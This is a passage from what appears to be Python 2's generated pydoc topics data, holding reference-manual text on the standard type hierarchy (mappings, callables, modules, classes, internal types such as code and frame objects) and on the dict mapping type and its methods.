As a frozenset is ' 'immutable\n' ' and *hashable*, it can be used again as an element of ' 'another\n' ' set, or as a dictionary key.\n' '\n' 'Mappings\n' ' These represent finite sets of objects indexed by arbitrary ' 'index\n' ' sets. The subscript notation "a[k]" selects the item indexed by ' '"k"\n' ' from the mapping "a"; this can be used in expressions and as ' 'the\n' ' target of assignments or "del" statements. The built-in ' 'function\n' ' "len()" returns the number of items in a mapping.\n' '\n' ' There is currently a single intrinsic mapping type:\n' '\n' ' Dictionaries\n' ' These represent finite sets of objects indexed by nearly\n' ' arbitrary values. The only types of values not acceptable ' 'as\n' ' keys are values containing lists or dictionaries or other\n' ' mutable types that are compared by value rather than by ' 'object\n' ' identity, the reason being that the efficient implementation ' 'of\n' " dictionaries requires a key's hash value to remain constant.\n" ' Numeric types used for keys obey the normal rules for ' 'numeric\n' ' comparison: if two numbers compare equal (e.g., "1" and ' '"1.0")\n' ' then they can be used interchangeably to index the same\n' ' dictionary entry.\n' '\n' ' Dictionaries are mutable; they can be created by the "{...}"\n' ' notation (see section Dictionary displays).\n' '\n' ' The extension modules "dbm", "gdbm", and "bsddb" provide\n' ' additional examples of mapping types.\n' '\n' 'Callable types\n' ' These are the types to which the function call operation (see\n' ' section Calls) can be applied:\n' '\n' ' User-defined functions\n' ' A user-defined function object is created by a function\n' ' definition (see section Function definitions). 
It should be\n' ' called with an argument list containing the same number of ' 'items\n' " as the function's formal parameter list.\n" '\n' ' Special attributes:\n' '\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | Attribute | Meaning ' '| |\n' ' ' '+=========================+=================================+=============+\n' ' | "__doc__" "func_doc" | The function\'s documentation ' '| Writable |\n' ' | | string, or "None" if ' '| |\n' ' | | unavailable. ' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__name__" "func_name" | The function\'s name. ' '| Writable |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__module__" | The name of the module the | ' 'Writable |\n' ' | | function was defined in, or ' '| |\n' ' | | "None" if unavailable. ' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__defaults__" | A tuple containing default | ' 'Writable |\n' ' | "func_defaults" | argument values for those ' '| |\n' ' | | arguments that have defaults, ' '| |\n' ' | | or "None" if no arguments have ' '| |\n' ' | | a default value. ' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__code__" "func_code" | The code object representing | ' 'Writable |\n' ' | | the compiled function body. ' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__globals__" | A reference to the dictionary | ' 'Read-only |\n' ' | "func_globals" | that holds the function\'s ' '| |\n' ' | | global variables --- the global ' '| |\n' ' | | namespace of the module in ' '| |\n' ' | | which the function was defined. ' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__dict__" "func_dict" | The namespace supporting | ' 'Writable |\n' ' | | arbitrary function attributes. 
' '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' ' | "__closure__" | "None" or a tuple of cells that | ' 'Read-only |\n' ' | "func_closure" | contain bindings for the ' '| |\n' " | | function's free variables. " '| |\n' ' ' '+-------------------------+---------------------------------+-------------+\n' '\n' ' Most of the attributes labelled "Writable" check the type of ' 'the\n' ' assigned value.\n' '\n' ' Changed in version 2.4: "func_name" is now writable.\n' '\n' ' Changed in version 2.6: The double-underscore attributes\n' ' "__closure__", "__code__", "__defaults__", and "__globals__"\n' ' were introduced as aliases for the corresponding "func_*"\n' ' attributes for forwards compatibility with Python 3.\n' '\n' ' Function objects also support getting and setting arbitrary\n' ' attributes, which can be used, for example, to attach ' 'metadata\n' ' to functions. Regular attribute dot-notation is used to get ' 'and\n' ' set such attributes. *Note that the current implementation ' 'only\n' ' supports function attributes on user-defined functions. 
' 'Function\n' ' attributes on built-in functions may be supported in the\n' ' future.*\n' '\n' " Additional information about a function's definition can be\n" ' retrieved from its code object; see the description of ' 'internal\n' ' types below.\n' '\n' ' User-defined methods\n' ' A user-defined method object combines a class, a class ' 'instance\n' ' (or "None") and any callable object (normally a user-defined\n' ' function).\n' '\n' ' Special read-only attributes: "im_self" is the class ' 'instance\n' ' object, "im_func" is the function object; "im_class" is the\n' ' class of "im_self" for bound methods or the class that asked ' 'for\n' ' the method for unbound methods; "__doc__" is the method\'s\n' ' documentation (same as "im_func.__doc__"); "__name__" is the\n' ' method name (same as "im_func.__name__"); "__module__" is ' 'the\n' ' name of the module the method was defined in, or "None" if\n' ' unavailable.\n' '\n' ' Changed in version 2.2: "im_self" used to refer to the class\n' ' that defined the method.\n' '\n' ' Changed in version 2.6: For Python 3 forward-compatibility,\n' ' "im_func" is also available as "__func__", and "im_self" as\n' ' "__self__".\n' '\n' ' Methods also support accessing (but not setting) the ' 'arbitrary\n' ' function attributes on the underlying function object.\n' '\n' ' User-defined method objects may be created when getting an\n' ' attribute of a class (perhaps via an instance of that class), ' 'if\n' ' that attribute is a user-defined function object, an unbound\n' ' user-defined method object, or a class method object. 
When ' 'the\n' ' attribute is a user-defined method object, a new method ' 'object\n' ' is only created if the class from which it is being retrieved ' 'is\n' ' the same as, or a derived class of, the class stored in the\n' ' original method object; otherwise, the original method object ' 'is\n' ' used as it is.\n' '\n' ' When a user-defined method object is created by retrieving a\n' ' user-defined function object from a class, its "im_self"\n' ' attribute is "None" and the method object is said to be ' 'unbound.\n' ' When one is created by retrieving a user-defined function ' 'object\n' ' from a class via one of its instances, its "im_self" ' 'attribute\n' ' is the instance, and the method object is said to be bound. ' 'In\n' ' either case, the new method\'s "im_class" attribute is the ' 'class\n' ' from which the retrieval takes place, and its "im_func"\n' ' attribute is the original function object.\n' '\n' ' When a user-defined method object is created by retrieving\n' ' another method object from a class or instance, the behaviour ' 'is\n' ' the same as for a function object, except that the "im_func"\n' ' attribute of the new instance is not the original method ' 'object\n' ' but its "im_func" attribute.\n' '\n' ' When a user-defined method object is created by retrieving a\n' ' class method object from a class or instance, its "im_self"\n' ' attribute is the class itself, and its "im_func" attribute ' 'is\n' ' the function object underlying the class method.\n' '\n' ' When an unbound user-defined method object is called, the\n' ' underlying function ("im_func") is called, with the ' 'restriction\n' ' that the first argument must be an instance of the proper ' 'class\n' ' ("im_class") or of a derived class thereof.\n' '\n' ' When a bound user-defined method object is called, the\n' ' underlying function ("im_func") is called, inserting the ' 'class\n' ' instance ("im_self") in front of the argument list. 
For\n' ' instance, when "C" is a class which contains a definition for ' 'a\n' ' function "f()", and "x" is an instance of "C", calling ' '"x.f(1)"\n' ' is equivalent to calling "C.f(x, 1)".\n' '\n' ' When a user-defined method object is derived from a class ' 'method\n' ' object, the "class instance" stored in "im_self" will ' 'actually\n' ' be the class itself, so that calling either "x.f(1)" or ' '"C.f(1)"\n' ' is equivalent to calling "f(C,1)" where "f" is the ' 'underlying\n' ' function.\n' '\n' ' Note that the transformation from function object to (unbound ' 'or\n' ' bound) method object happens each time the attribute is\n' ' retrieved from the class or instance. In some cases, a ' 'fruitful\n' ' optimization is to assign the attribute to a local variable ' 'and\n' ' call that local variable. Also notice that this ' 'transformation\n' ' only happens for user-defined functions; other callable ' 'objects\n' ' (and all non-callable objects) are retrieved without\n' ' transformation. 
It is also important to note that ' 'user-defined\n' ' functions which are attributes of a class instance are not\n' ' converted to bound methods; this *only* happens when the\n' ' function is an attribute of the class.\n' '\n' ' Generator functions\n' ' A function or method which uses the "yield" statement (see\n' ' section The yield statement) is called a *generator ' 'function*.\n' ' Such a function, when called, always returns an iterator ' 'object\n' ' which can be used to execute the body of the function: ' 'calling\n' ' the iterator\'s "next()" method will cause the function to\n' ' execute until it provides a value using the "yield" ' 'statement.\n' ' When the function executes a "return" statement or falls off ' 'the\n' ' end, a "StopIteration" exception is raised and the iterator ' 'will\n' ' have reached the end of the set of values to be returned.\n' '\n' ' Built-in functions\n' ' A built-in function object is a wrapper around a C function.\n' ' Examples of built-in functions are "len()" and "math.sin()"\n' ' ("math" is a standard built-in module). The number and type ' 'of\n' ' the arguments are determined by the C function. Special ' 'read-\n' ' only attributes: "__doc__" is the function\'s documentation\n' ' string, or "None" if unavailable; "__name__" is the ' "function's\n" ' name; "__self__" is set to "None" (but see the next item);\n' ' "__module__" is the name of the module the function was ' 'defined\n' ' in or "None" if unavailable.\n' '\n' ' Built-in methods\n' ' This is really a different disguise of a built-in function, ' 'this\n' ' time containing an object passed to the C function as an\n' ' implicit extra argument. An example of a built-in method is\n' ' "alist.append()", assuming *alist* is a list object. In this\n' ' case, the special read-only attribute "__self__" is set to ' 'the\n' ' object denoted by *alist*.\n' '\n' ' Class Types\n' ' Class types, or "new-style classes," are callable. 
These\n' ' objects normally act as factories for new instances of\n' ' themselves, but variations are possible for class types that\n' ' override "__new__()". The arguments of the call are passed ' 'to\n' ' "__new__()" and, in the typical case, to "__init__()" to\n' ' initialize the new instance.\n' '\n' ' Classic Classes\n' ' Class objects are described below. When a class object is\n' ' called, a new class instance (also described below) is ' 'created\n' " and returned. This implies a call to the class's " '"__init__()"\n' ' method if it has one. Any arguments are passed on to the\n' ' "__init__()" method. If there is no "__init__()" method, ' 'the\n' ' class must be called without arguments.\n' '\n' ' Class instances\n' ' Class instances are described below. Class instances are\n' ' callable only when the class has a "__call__()" method;\n' ' "x(arguments)" is a shorthand for "x.__call__(arguments)".\n' '\n' 'Modules\n' ' Modules are imported by the "import" statement (see section The\n' ' import statement). A module object has a namespace implemented ' 'by a\n' ' dictionary object (this is the dictionary referenced by the\n' ' func_globals attribute of functions defined in the module).\n' ' Attribute references are translated to lookups in this ' 'dictionary,\n' ' e.g., "m.x" is equivalent to "m.__dict__["x"]". A module object\n' ' does not contain the code object used to initialize the module\n' " (since it isn't needed once the initialization is done).\n" '\n' " Attribute assignment updates the module's namespace dictionary,\n" ' e.g., "m.x = 1" is equivalent to "m.__dict__["x"] = 1".\n' '\n' ' Special read-only attribute: "__dict__" is the module\'s ' 'namespace\n' ' as a dictionary object.\n' '\n' ' **CPython implementation detail:** Because of the way CPython\n' ' clears module dictionaries, the module dictionary will be ' 'cleared\n' ' when the module falls out of scope even if the dictionary still ' 'has\n' ' live references. 
To avoid this, copy the dictionary or keep ' 'the\n' ' module around while using its dictionary directly.\n' '\n' ' Predefined (writable) attributes: "__name__" is the module\'s ' 'name;\n' ' "__doc__" is the module\'s documentation string, or "None" if\n' ' unavailable; "__file__" is the pathname of the file from which ' 'the\n' ' module was loaded, if it was loaded from a file. The "__file__"\n' ' attribute is not present for C modules that are statically ' 'linked\n' ' into the interpreter; for extension modules loaded dynamically ' 'from\n' ' a shared library, it is the pathname of the shared library ' 'file.\n' '\n' 'Classes\n' ' Both class types (new-style classes) and class objects (old-\n' ' style/classic classes) are typically created by class ' 'definitions\n' ' (see section Class definitions). A class has a namespace\n' ' implemented by a dictionary object. Class attribute references ' 'are\n' ' translated to lookups in this dictionary, e.g., "C.x" is ' 'translated\n' ' to "C.__dict__["x"]" (although for new-style classes in ' 'particular\n' ' there are a number of hooks which allow for other means of ' 'locating\n' ' attributes). When the attribute name is not found there, the\n' ' attribute search continues in the base classes. For old-style\n' ' classes, the search is depth-first, left-to-right in the order ' 'of\n' ' occurrence in the base class list. 
New-style classes use the ' 'more\n' ' complex C3 method resolution order which behaves correctly even ' 'in\n' " the presence of 'diamond' inheritance structures where there " 'are\n' ' multiple inheritance paths leading back to a common ancestor.\n' ' Additional details on the C3 MRO used by new-style classes can ' 'be\n' ' found in the documentation accompanying the 2.3 release at\n' ' https://www.python.org/download/releases/2.3/mro/.\n' '\n' ' When a class attribute reference (for class "C", say) would ' 'yield a\n' ' user-defined function object or an unbound user-defined method\n' ' object whose associated class is either "C" or one of its base\n' ' classes, it is transformed into an unbound user-defined method\n' ' object whose "im_class" attribute is "C". When it would yield a\n' ' class method object, it is transformed into a bound ' 'user-defined\n' ' method object whose "im_self" attribute is "C". When it would\n' ' yield a static method object, it is transformed into the object\n' ' wrapped by the static method object. 
See section Implementing\n' ' Descriptors for another way in which attributes retrieved from ' 'a\n' ' class may differ from those actually contained in its ' '"__dict__"\n' ' (note that only new-style classes support descriptors).\n' '\n' " Class attribute assignments update the class's dictionary, " 'never\n' ' the dictionary of a base class.\n' '\n' ' A class object can be called (see above) to yield a class ' 'instance\n' ' (see below).\n' '\n' ' Special attributes: "__name__" is the class name; "__module__" ' 'is\n' ' the module name in which the class was defined; "__dict__" is ' 'the\n' ' dictionary containing the class\'s namespace; "__bases__" is a ' 'tuple\n' ' (possibly empty or a singleton) containing the base classes, in ' 'the\n' ' order of their occurrence in the base class list; "__doc__" is ' 'the\n' " class's documentation string, or None if undefined.\n" '\n' 'Class instances\n' ' A class instance is created by calling a class object (see ' 'above).\n' ' A class instance has a namespace implemented as a dictionary ' 'which\n' ' is the first place in which attribute references are searched.\n' " When an attribute is not found there, and the instance's class " 'has\n' ' an attribute by that name, the search continues with the class\n' ' attributes. If a class attribute is found that is a ' 'user-defined\n' ' function object or an unbound user-defined method object whose\n' ' associated class is the class (call it "C") of the instance for\n' ' which the attribute reference was initiated or one of its bases, ' 'it\n' ' is transformed into a bound user-defined method object whose\n' ' "im_class" attribute is "C" and whose "im_self" attribute is ' 'the\n' ' instance. Static method and class method objects are also\n' ' transformed, as if they had been retrieved from class "C"; see\n' ' above under "Classes". 
See section Implementing Descriptors for\n' ' another way in which attributes of a class retrieved via its\n' ' instances may differ from the objects actually stored in the\n' ' class\'s "__dict__". If no class attribute is found, and the\n' ' object\'s class has a "__getattr__()" method, that is called to\n' ' satisfy the lookup.\n' '\n' " Attribute assignments and deletions update the instance's\n" " dictionary, never a class's dictionary. If the class has a\n" ' "__setattr__()" or "__delattr__()" method, this is called ' 'instead\n' ' of updating the instance dictionary directly.\n' '\n' ' Class instances can pretend to be numbers, sequences, or ' 'mappings\n' ' if they have methods with certain special names. See section\n' ' Special method names.\n' '\n' ' Special attributes: "__dict__" is the attribute dictionary;\n' ' "__class__" is the instance\'s class.\n' '\n' 'Files\n' ' A file object represents an open file. File objects are created ' 'by\n' ' the "open()" built-in function, and also by "os.popen()",\n' ' "os.fdopen()", and the "makefile()" method of socket objects ' '(and\n' ' perhaps by other functions or methods provided by extension\n' ' modules). The objects "sys.stdin", "sys.stdout" and ' '"sys.stderr"\n' ' are initialized to file objects corresponding to the ' "interpreter's\n" ' standard input, output and error streams. See File Objects for\n' ' complete documentation of file objects.\n' '\n' 'Internal types\n' ' A few types used internally by the interpreter are exposed to ' 'the\n' ' user. Their definitions may change with future versions of the\n' ' interpreter, but they are mentioned here for completeness.\n' '\n' ' Code objects\n' ' Code objects represent *byte-compiled* executable Python ' 'code,\n' ' or *bytecode*. 
The difference between a code object and a\n' ' function object is that the function object contains an ' 'explicit\n' " reference to the function's globals (the module in which it " 'was\n' ' defined), while a code object contains no context; also the\n' ' default argument values are stored in the function object, ' 'not\n' ' in the code object (because they represent values calculated ' 'at\n' ' run-time). Unlike function objects, code objects are ' 'immutable\n' ' and contain no references (directly or indirectly) to ' 'mutable\n' ' objects.\n' '\n' ' Special read-only attributes: "co_name" gives the function ' 'name;\n' ' "co_argcount" is the number of positional arguments ' '(including\n' ' arguments with default values); "co_nlocals" is the number ' 'of\n' ' local variables used by the function (including arguments);\n' ' "co_varnames" is a tuple containing the names of the local\n' ' variables (starting with the argument names); "co_cellvars" ' 'is a\n' ' tuple containing the names of local variables that are\n' ' referenced by nested functions; "co_freevars" is a tuple\n' ' containing the names of free variables; "co_code" is a ' 'string\n' ' representing the sequence of bytecode instructions; ' '"co_consts"\n' ' is a tuple containing the literals used by the bytecode;\n' ' "co_names" is a tuple containing the names used by the ' 'bytecode;\n' ' "co_filename" is the filename from which the code was ' 'compiled;\n' ' "co_firstlineno" is the first line number of the function;\n' ' "co_lnotab" is a string encoding the mapping from bytecode\n' ' offsets to line numbers (for details see the source code of ' 'the\n' ' interpreter); "co_stacksize" is the required stack size\n' ' (including local variables); "co_flags" is an integer ' 'encoding a\n' ' number of flags for the interpreter.\n' '\n' ' The following flag bits are defined for "co_flags": bit ' '"0x04"\n' ' is set if the function uses the "*arguments" syntax to accept ' 'an\n' ' arbitrary number of 
positional arguments; bit "0x08" is set ' 'if\n' ' the function uses the "**keywords" syntax to accept ' 'arbitrary\n' ' keyword arguments; bit "0x20" is set if the function is a\n' ' generator.\n' '\n' ' Future feature declarations ("from __future__ import ' 'division")\n' ' also use bits in "co_flags" to indicate whether a code ' 'object\n' ' was compiled with a particular feature enabled: bit "0x2000" ' 'is\n' ' set if the function was compiled with future division ' 'enabled;\n' ' bits "0x10" and "0x1000" were used in earlier versions of\n' ' Python.\n' '\n' ' Other bits in "co_flags" are reserved for internal use.\n' '\n' ' If a code object represents a function, the first item in\n' ' "co_consts" is the documentation string of the function, or\n' ' "None" if undefined.\n' '\n' ' Frame objects\n' ' Frame objects represent execution frames. They may occur in\n' ' traceback objects (see below).\n' '\n' ' Special read-only attributes: "f_back" is to the previous ' 'stack\n' ' frame (towards the caller), or "None" if this is the bottom\n' ' stack frame; "f_code" is the code object being executed in ' 'this\n' ' frame; "f_locals" is the dictionary used to look up local\n' ' variables; "f_globals" is used for global variables;\n' ' "f_builtins" is used for built-in (intrinsic) names;\n' ' "f_restricted" is a flag indicating whether the function is\n' ' executing in restricted execution mode; "f_lasti" gives the\n' ' precise instruction (this is an index into the bytecode ' 'string\n' ' of the code object).\n' '\n' ' Special writable attributes: "f_trace", if not "None", is a\n' ' function called at the start of each source code line (this ' 'is\n' ' used by the debugger); "f_exc_type", "f_exc_value",\n' ' "f_exc_traceback" represent the last exception raised in the\n' ' parent frame provided another exception was ever raised in ' 'the\n' ' current frame (in all other cases they are None); "f_lineno" ' 'is\n' ' the current line number of the frame --- writing to this 
' 'from\n' ' within a trace function jumps to the given line (only for ' 'the\n' ' bottom-most frame). A debugger can implement a Jump command\n' ' (aka Set Next Statement) by writing to f_lineno.\n' '\n' ' Traceback objects\n' ' Traceback objects represent a stack trace of an exception. ' 'A\n' ' traceback object is created when an exception occurs. When ' 'the\n' ' search for an exception handler unwinds the execution stack, ' 'at\n' ' each unwound level a traceback object is inserted in front ' 'of\n' ' the current traceback. When an exception handler is ' 'entered,\n' ' the stack trace is made available to the program. (See ' 'section\n' ' The try statement.) It is accessible as "sys.exc_traceback", ' 'and\n' ' also as the third item of the tuple returned by\n' ' "sys.exc_info()". The latter is the preferred interface, ' 'since\n' ' it works correctly when the program is using multiple ' 'threads.\n' ' When the program contains no suitable handler, the stack ' 'trace\n' ' is written (nicely formatted) to the standard error stream; ' 'if\n' ' the interpreter is interactive, it is also made available to ' 'the\n' ' user as "sys.last_traceback".\n' '\n' ' Special read-only attributes: "tb_next" is the next level in ' 'the\n' ' stack trace (towards the frame where the exception occurred), ' 'or\n' ' "None" if there is no next level; "tb_frame" points to the\n' ' execution frame of the current level; "tb_lineno" gives the ' 'line\n' ' number where the exception occurred; "tb_lasti" indicates ' 'the\n' ' precise instruction. The line number and last instruction ' 'in\n' ' the traceback may differ from the line number of its frame\n' ' object if the exception occurred in a "try" statement with ' 'no\n' ' matching except clause or with a finally clause.\n' '\n' ' Slice objects\n' ' Slice objects are used to represent slices when *extended ' 'slice\n' ' syntax* is used. 
This is a slice using two colons, or ' 'multiple\n' ' slices or ellipses separated by commas, e.g., "a[i:j:step]",\n' ' "a[i:j, k:l]", or "a[..., i:j]". They are also created by ' 'the\n' ' built-in "slice()" function.\n' '\n' ' Special read-only attributes: "start" is the lower bound; ' '"stop"\n' ' is the upper bound; "step" is the step value; each is "None" ' 'if\n' ' omitted. These attributes can have any type.\n' '\n' ' Slice objects support one method:\n' '\n' ' slice.indices(self, length)\n' '\n' ' This method takes a single integer argument *length* and\n' ' computes information about the extended slice that the ' 'slice\n' ' object would describe if applied to a sequence of ' '*length*\n' ' items. It returns a tuple of three integers; ' 'respectively\n' ' these are the *start* and *stop* indices and the *step* ' 'or\n' ' stride length of the slice. Missing or out-of-bounds ' 'indices\n' ' are handled in a manner consistent with regular slices.\n' '\n' ' New in version 2.3.\n' '\n' ' Static method objects\n' ' Static method objects provide a way of defeating the\n' ' transformation of function objects to method objects ' 'described\n' ' above. A static method object is a wrapper around any other\n' ' object, usually a user-defined method object. When a static\n' ' method object is retrieved from a class or a class instance, ' 'the\n' ' object actually returned is the wrapped object, which is not\n' ' subject to any further transformation. Static method objects ' 'are\n' ' not themselves callable, although the objects they wrap ' 'usually\n' ' are. Static method objects are created by the built-in\n' ' "staticmethod()" constructor.\n' '\n' ' Class method objects\n' ' A class method object, like a static method object, is a ' 'wrapper\n' ' around another object that alters the way in which that ' 'object\n' ' is retrieved from classes and class instances. 
The behaviour ' 'of\n' ' class method objects upon such retrieval is described above,\n' ' under "User-defined methods". Class method objects are ' 'created\n' ' by the built-in "classmethod()" constructor.\n', 'typesfunctions': '\n' 'Functions\n' '*********\n' '\n' 'Function objects are created by function definitions. The ' 'only\n' 'operation on a function object is to call it: ' '"func(argument-list)".\n' '\n' 'There are really two flavors of function objects: built-in ' 'functions\n' 'and user-defined functions. Both support the same ' 'operation (to call\n' 'the function), but the implementation is different, hence ' 'the\n' 'different object types.\n' '\n' 'See Function definitions for more information.\n', 'typesmapping': '\n' 'Mapping Types --- "dict"\n' '************************\n' '\n' 'A *mapping* object maps *hashable* values to arbitrary ' 'objects.\n' 'Mappings are mutable objects. There is currently only one ' 'standard\n' 'mapping type, the *dictionary*. (For other containers see ' 'the built\n' 'in "list", "set", and "tuple" classes, and the "collections" ' 'module.)\n' '\n' "A dictionary's keys are *almost* arbitrary values. Values " 'that are\n' 'not *hashable*, that is, values containing lists, ' 'dictionaries or\n' 'other mutable types (that are compared by value rather than ' 'by object\n' 'identity) may not be used as keys. Numeric types used for ' 'keys obey\n' 'the normal rules for numeric comparison: if two numbers ' 'compare equal\n' '(such as "1" and "1.0") then they can be used ' 'interchangeably to index\n' 'the same dictionary entry. 
(Note however, that since ' 'computers store\n' 'floating-point numbers as approximations it is usually ' 'unwise to use\n' 'them as dictionary keys.)\n' '\n' 'Dictionaries can be created by placing a comma-separated ' 'list of "key:\n' 'value" pairs within braces, for example: "{\'jack\': 4098, ' "'sjoerd':\n" '4127}" or "{4098: \'jack\', 4127: \'sjoerd\'}", or by the ' '"dict"\n' 'constructor.\n' '\n' 'class dict(**kwarg)\n' 'class dict(mapping, **kwarg)\n' 'class dict(iterable, **kwarg)\n' '\n' ' Return a new dictionary initialized from an optional ' 'positional\n' ' argument and a possibly empty set of keyword arguments.\n' '\n' ' If no positional argument is given, an empty dictionary ' 'is created.\n' ' If a positional argument is given and it is a mapping ' 'object, a\n' ' dictionary is created with the same key-value pairs as ' 'the mapping\n' ' object. Otherwise, the positional argument must be an ' '*iterable*\n' ' object. Each item in the iterable must itself be an ' 'iterable with\n' ' exactly two objects. The first object of each item ' 'becomes a key\n' ' in the new dictionary, and the second object the ' 'corresponding\n' ' value. If a key occurs more than once, the last value ' 'for that key\n' ' becomes the corresponding value in the new dictionary.\n' '\n' ' If keyword arguments are given, the keyword arguments and ' 'their\n' ' values are added to the dictionary created from the ' 'positional\n' ' argument. 
If a key being added is already present, the ' 'value from\n' ' the keyword argument replaces the value from the ' 'positional\n' ' argument.\n' '\n' ' To illustrate, the following examples all return a ' 'dictionary equal\n' ' to "{"one": 1, "two": 2, "three": 3}":\n' '\n' ' >>> a = dict(one=1, two=2, three=3)\n' " >>> b = {'one': 1, 'two': 2, 'three': 3}\n" " >>> c = dict(zip(['one', 'two', 'three'], [1, 2, 3]))\n" " >>> d = dict([('two', 2), ('one', 1), ('three', 3)])\n" " >>> e = dict({'three': 3, 'one': 1, 'two': 2})\n" ' >>> a == b == c == d == e\n' ' True\n' '\n' ' Providing keyword arguments as in the first example only ' 'works for\n' ' keys that are valid Python identifiers. Otherwise, any ' 'valid keys\n' ' can be used.\n' '\n' ' New in version 2.2.\n' '\n' ' Changed in version 2.3: Support for building a dictionary ' 'from\n' ' keyword arguments added.\n' '\n' ' These are the operations that dictionaries support (and ' 'therefore,\n' ' custom mapping types should support too):\n' '\n' ' len(d)\n' '\n' ' Return the number of items in the dictionary *d*.\n' '\n' ' d[key]\n' '\n' ' Return the item of *d* with key *key*. Raises a ' '"KeyError" if\n' ' *key* is not in the map.\n' '\n' ' If a subclass of dict defines a method "__missing__()" ' 'and *key*\n' ' is not present, the "d[key]" operation calls that ' 'method with\n' ' the key *key* as argument. The "d[key]" operation ' 'then returns\n' ' or raises whatever is returned or raised by the\n' ' "__missing__(key)" call. No other operations or ' 'methods invoke\n' ' "__missing__()". If "__missing__()" is not defined, ' '"KeyError"\n' ' is raised. "__missing__()" must be a method; it cannot ' 'be an\n' ' instance variable:\n' '\n' ' >>> class Counter(dict):\n' ' ... def __missing__(self, key):\n' ' ... return 0\n' ' >>> c = Counter()\n' " >>> c['red']\n" ' 0\n' " >>> c['red'] += 1\n" " >>> c['red']\n" ' 1\n' '\n' ' The example above shows part of the implementation of\n' ' "collections.Counter". 
A different "__missing__" ' 'method is used\n' ' by "collections.defaultdict".\n' '\n' ' New in version 2.5: Recognition of __missing__ methods ' 'of dict\n' ' subclasses.\n' '\n' ' d[key] = value\n' '\n' ' Set "d[key]" to *value*.\n' '\n' ' del d[key]\n' '\n' ' Remove "d[key]" from *d*. Raises a "KeyError" if ' '*key* is not\n' ' in the map.\n' '\n' ' key in d\n' '\n' ' Return "True" if *d* has a key *key*, else "False".\n' '\n' ' New in version 2.2.\n' '\n' ' key not in d\n' '\n' ' Equivalent to "not key in d".\n' '\n' ' New in version 2.2.\n' '\n' ' iter(d)\n' '\n' ' Return an iterator over the keys of the dictionary. ' 'This is a\n' ' shortcut for "iterkeys()".\n' '\n' ' clear()\n' '\n' ' Remove all items from the dictionary.\n' '\n' ' copy()\n' '\n' ' Return a shallow copy of the dictionary.\n' '\n' ' fromkeys(seq[, value])\n' '\n' ' Create a new dictionary with keys from *seq* and ' 'values set to\n' ' *value*.\n' '\n' ' "fromkeys()" is a class method that returns a new ' 'dictionary.\n' ' *value* defaults to "None".\n' '\n' ' New in version 2.3.\n' '\n' ' get(key[, default])\n' '\n' ' Return the value for *key* if *key* is in the ' 'dictionary, else\n' ' *default*. If *default* is not given, it defaults to ' '"None", so\n' ' that this method never raises a "KeyError".\n' '\n' ' has_key(key)\n' '\n' ' Test for the presence of *key* in the dictionary. ' '"has_key()"\n' ' is deprecated in favor of "key in d".\n' '\n' ' items()\n' '\n' ' Return a copy of the dictionary\'s list of "(key, ' 'value)" pairs.\n' '\n' ' **CPython implementation detail:** Keys and values are ' 'listed in\n' ' an arbitrary order which is non-random, varies across ' 'Python\n' " implementations, and depends on the dictionary's " 'history of\n' ' insertions and deletions.\n' '\n' ' If "items()", "keys()", "values()", "iteritems()", ' '"iterkeys()",\n' ' and "itervalues()" are called with no intervening ' 'modifications\n' ' to the dictionary, the lists will directly ' 'correspond. 
This\n' ' allows the creation of "(value, key)" pairs using ' '"zip()":\n' ' "pairs = zip(d.values(), d.keys())". The same ' 'relationship\n' ' holds for the "iterkeys()" and "itervalues()" methods: ' '"pairs =\n' ' zip(d.itervalues(), d.iterkeys())" provides the same ' 'value for\n' ' "pairs". Another way to create the same list is "pairs ' '= [(v, k)\n' ' for (k, v) in d.iteritems()]".\n' '\n' ' iteritems()\n' '\n' ' Return an iterator over the dictionary\'s "(key, ' 'value)" pairs.\n' ' See the note for "dict.items()".\n' '\n' ' Using "iteritems()" while adding or deleting entries ' 'in the\n' ' dictionary may raise a "RuntimeError" or fail to ' 'iterate over\n' ' all entries.\n' '\n' ' New in version 2.2.\n' '\n' ' iterkeys()\n' '\n' " Return an iterator over the dictionary's keys. See " 'the note for\n' ' "dict.items()".\n' '\n' ' Using "iterkeys()" while adding or deleting entries in ' 'the\n' ' dictionary may raise a "RuntimeError" or fail to ' 'iterate over\n' ' all entries.\n' '\n' ' New in version 2.2.\n' '\n' ' itervalues()\n' '\n' " Return an iterator over the dictionary's values. See " 'the note\n' ' for "dict.items()".\n' '\n' ' Using "itervalues()" while adding or deleting entries ' 'in the\n' ' dictionary may raise a "RuntimeError" or fail to ' 'iterate over\n' ' all entries.\n' '\n' ' New in version 2.2.\n' '\n' ' keys()\n' '\n' " Return a copy of the dictionary's list of keys. See " 'the note\n' ' for "dict.items()".\n' '\n' ' pop(key[, default])\n' '\n' ' If *key* is in the dictionary, remove it and return ' 'its value,\n' ' else return *default*. If *default* is not given and ' '*key* is\n' ' not in the dictionary, a "KeyError" is raised.\n' '\n' ' New in version 2.3.\n' '\n' ' popitem()\n' '\n' ' Remove and return an arbitrary "(key, value)" pair ' 'from the\n' ' dictionary.\n' '\n' ' "popitem()" is useful to destructively iterate over a\n' ' dictionary, as often used in set algorithms. 
If the ' 'dictionary\n' ' is empty, calling "popitem()" raises a "KeyError".\n' '\n' ' setdefault(key[, default])\n' '\n' ' If *key* is in the dictionary, return its value. If ' 'not, insert\n' ' *key* with a value of *default* and return *default*. ' '*default*\n' ' defaults to "None".\n' '\n' ' update([other])\n' '\n' ' Update the dictionary with the key/value pairs from ' '*other*,\n' ' overwriting existing keys. Return "None".\n' '\n' ' "update()" accepts either another dictionary object or ' 'an\n' ' iterable of key/value pairs (as tuples or other ' 'iterables of\n' ' length two). If keyword arguments are specified, the ' 'dictionary\n' ' is then updated with those key/value pairs: ' '"d.update(red=1,\n' ' blue=2)".\n' '\n' ' Changed in version 2.4: Allowed the argument to be an ' 'iterable\n' ' of key/value pairs and allowed keyword arguments.\n' '\n' ' values()\n' '\n' " Return a copy of the dictionary's list of values. See " 'the note\n' ' for "dict.items()".\n' '\n' ' viewitems()\n' '\n' ' Return a new view of the dictionary\'s items ("(key, ' 'value)"\n' ' pairs). See below for documentation of view objects.\n' '\n' ' New in version 2.7.\n' '\n' ' viewkeys()\n' '\n' " Return a new view of the dictionary's 